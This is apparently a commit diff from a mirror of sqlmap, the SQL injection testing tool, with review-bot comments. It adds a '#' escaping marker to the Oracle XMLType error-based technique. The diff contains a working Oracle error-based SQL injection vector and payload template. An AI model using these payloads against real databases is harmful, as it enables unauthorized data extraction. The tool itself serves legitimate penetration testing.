mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 19:13:48 +03:00
Oracle's XMLType doesn't like '#' char too
parent
761ec7529a
commit
ac5a752b12
|
@ -217,7 +217,8 @@ class Agent:
|
||||||
_ = (
|
_ = (
|
||||||
("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDSTR]", randStr),\
|
("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDSTR]", randStr),\
|
||||||
("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
|
("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
|
||||||
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar)
|
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
|
||||||
|
("[HASH_REPLACE]", kb.chars.hash_)
|
||||||
)
|
)
|
||||||
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
|
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
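Review bot: The `\` continuations on the tuple rows are redundant, because the rows already sit inside the parentheses opened by `_ = (`; as a result, adding the `[HASH_REPLACE]` row also meant editing the previous row to append `,\`. Dropping the backslashes and ending every row with a comma, including the last one as `("[HASH_REPLACE]", kb.chars.hash_),`, would make the next placeholder a one-line change. A short comment above the table, such as `# *_REPLACE markers must match the decode chain in __errorReplaceChars()`, would help because the two lists are kept in step by hand. The enclosing method starts and ends outside the hunk.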
|
||||||
|
|
||||||
|
|
|
@ -1502,9 +1502,8 @@ def __setKnowledgeBaseAttributes(flushAll=True):
|
||||||
kb.chars.delimiter = randomStr(length=6, lowercase=True)
|
kb.chars.delimiter = randomStr(length=6, lowercase=True)
|
||||||
kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True)
|
kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True)
|
||||||
kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True)
|
kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True)
|
||||||
kb.chars.at = ":%s:" % randomStr(length=1, lowercase=True)
|
|
||||||
kb.chars.space = ":%s:" % randomStr(length=1, lowercase=True)
|
kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in randomStr(length=4, lowercase=True))
|
||||||
kb.chars.dollar = ":%s:" % randomStr(length=1, lowercase=True)
|
|
||||||
|
|
||||||
if flushAll:
|
if flushAll:
|
||||||
kb.headerPaths = {}
|
kb.headerPaths = {}
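Review bot: The new one-line assignment takes the four markers from the characters of a single `randomStr(length=4, lowercase=True)` result, and nothing visible here guarantees those four characters are distinct. If `randomStr` can repeat a letter, two of `kb.chars.at`, `kb.chars.space`, `kb.chars.dollar` and `kb.chars.hash_` get the same `:x:` value, and the chained `.replace()` calls in `__errorReplaceChars` decode both to whichever character is replaced first. The old code drew each marker independently and had the same weakness, but a fourth marker makes a clash more likely. Sampling without replacement avoids it: `kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in random.sample(string.ascii_lowercase, 4))`, assuming `random` and `string` are imported in this module, which the hunk does not show. The function body continues outside the hunk.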
|
||||||
|
|
|
@ -180,7 +180,7 @@ def __errorReplaceChars(value):
|
||||||
retVal = value
|
retVal = value
|
||||||
|
|
||||||
if value:
|
if value:
|
||||||
retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@")
|
retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#")
|
||||||
|
|
||||||
return retVal
|
return retVal
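Review bot: The decode step is now a four-call `.replace()` chain on one line, and it has to list the same marker/character pairs as the `REPLACE(...)` nesting in the Oracle vector and the placeholder table in `Agent`. Writing it as a loop over pairs keeps the mapping readable and makes the order explicit: `for marker, char in ((kb.chars.space, " "), (kb.chars.dollar, "$"), (kb.chars.at, "@"), (kb.chars.hash_, "#")):` followed by `retVal = retVal.replace(marker, char)`. The function also has no docstring; one sentence saying that it restores the characters the payload substituted, because XMLType rejects them, would explain why the mapping exists. The `def` line is visible only in the hunk header, so any existing docstring would be outside this view.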
|
||||||
|
|
||||||
|
|
|
@ -1242,7 +1242,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
|